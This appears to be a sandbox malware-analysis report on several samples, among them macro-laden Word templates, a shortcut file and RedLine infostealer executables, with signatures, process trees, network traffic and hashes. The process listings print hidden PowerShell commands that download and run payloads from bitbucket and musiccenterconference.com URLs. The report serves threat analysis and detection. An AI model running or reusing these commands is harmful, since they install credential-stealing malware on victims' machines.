"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4E131FA6D7A76DA7482422BA4921E3C2 --mojo-platform-channel-handle=2688 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CD46DBD0CBDBBF1467E62E117F5CD6F --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 135.240.123.92.in-addr.arpa udp
US 8.8.8.8:53 107.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 a8ba35cf0d2196d5e21cff5824e0746b
SHA1 1947ff92508fc788d6976adc45cda309d5cdfc58
SHA256 59067ae943dfaf7eb37cbc4eae2ff160fa451db9028b7ceaef48be401276f4f9
SHA512 bda2c399d1953ac3c4592e07faadd36049440fdab1b66c7040cd2c15f7aa5213e5f220b2e7bedd87ca9cacbcd0747fe68f1cefb7b43403e6a7b15ad010873a4d

memory/224-123-0x000000000B4D0000-0x000000000B77B000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

132s

Max time network

38s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2900-0-0x000000002FA51000-0x000000002FA52000-memory.dmp

memory/2900-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2900-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2900-6-0x0000000004F00000-0x0000000005000000-memory.dmp

memory/2900-11-0x0000000004F00000-0x0000000005000000-memory.dmp

memory/2900-13-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2900-14-0x0000000004F00000-0x0000000005000000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240708-en

Max time kernel

119s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1504 set thread context of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\SysWOW64\WerFault.exe
PID 1504 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\SysWOW64\WerFault.exe
PID 1504 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\SysWOW64\WerFault.exe
PID 1504 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\SysWOW64\WerFault.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 48

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 492

Network

N/A

Files

memory/1504-0-0x00000000012FC000-0x00000000012FD000-memory.dmp

memory/2832-1-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-2-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-9-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-6-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2832-8-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-10-0x000000007494E000-0x000000007494F000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

133s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1444 set thread context of 2372 N/A C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Network

Country Destination Domain Proto
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp

Files

memory/1444-0-0x000000007436E000-0x000000007436F000-memory.dmp

memory/1444-1-0x0000000000290000-0x00000000002DA000-memory.dmp

memory/1444-2-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-3-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-4-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-8-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-7-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2372-6-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-5-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-12-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-10-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-13-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/1444-14-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-15-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-16-0x0000000074360000-0x0000000074A4E000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -Command "Start-BitsTransfer -Source 'https://musiccenterconference.com/dwl/12.ps1' -Destination $($env:APPDATA + '\12.ps1'); & $($env:APPDATA + '\12.ps1')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 musiccenterconference.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/1984-2-0x00007FFFAC2A3000-0x00007FFFAC2A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwmm2hgm.2is.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1984-12-0x00000221D5310000-0x00000221D5332000-memory.dmp

memory/1984-13-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-14-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-15-0x00000221D5680000-0x00000221D56A6000-memory.dmp

memory/1984-16-0x00000221D56D0000-0x00000221D56E4000-memory.dmp

memory/1984-17-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-20-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-21-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

156s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/4064-0-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-1-0x00007FFD961CD000-0x00007FFD961CE000-memory.dmp

memory/4064-2-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-3-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-7-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-6-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-5-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-9-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-10-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-8-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-4-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-12-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-11-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-13-0x00007FFD53FF0000-0x00007FFD54000000-memory.dmp

memory/4064-14-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-15-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-17-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-18-0x00007FFD53FF0000-0x00007FFD54000000-memory.dmp

memory/4064-16-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-35-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-36-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-40-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-41-0x00007FFD961CD000-0x00007FFD961CE000-memory.dmp

memory/4064-42-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-48-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

memory/4064-49-0x00007FFD96130000-0x00007FFD96325000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

72s

Max time network

43s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm"

Network

N/A

Files

memory/2932-0-0x000000002F251000-0x000000002F252000-memory.dmp

memory/2932-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2932-2-0x00000000719BD000-0x00000000719C8000-memory.dmp

memory/2932-6-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-8-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-7-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-5-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-4-0x00000000002C0000-0x00000000003C0000-memory.dmp

memory/2932-9-0x00000000719BD000-0x00000000719C8000-memory.dmp

memory/2932-10-0x00000000002C0000-0x00000000003C0000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

118s

Max time network

128s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\egor.dotm"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/Zos.e`xe -Dest C:\Users\Public\Zos.e`xe;C:\Users\Public\Zos.e`xe

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2816-0-0x000000002F731000-0x000000002F732000-memory.dmp

memory/2816-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2816-2-0x000000007174D000-0x0000000071758000-memory.dmp

memory/2816-6-0x0000000006110000-0x0000000006210000-memory.dmp

memory/2816-10-0x000000007174D000-0x0000000071758000-memory.dmp

memory/2816-11-0x0000000006110000-0x0000000006210000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
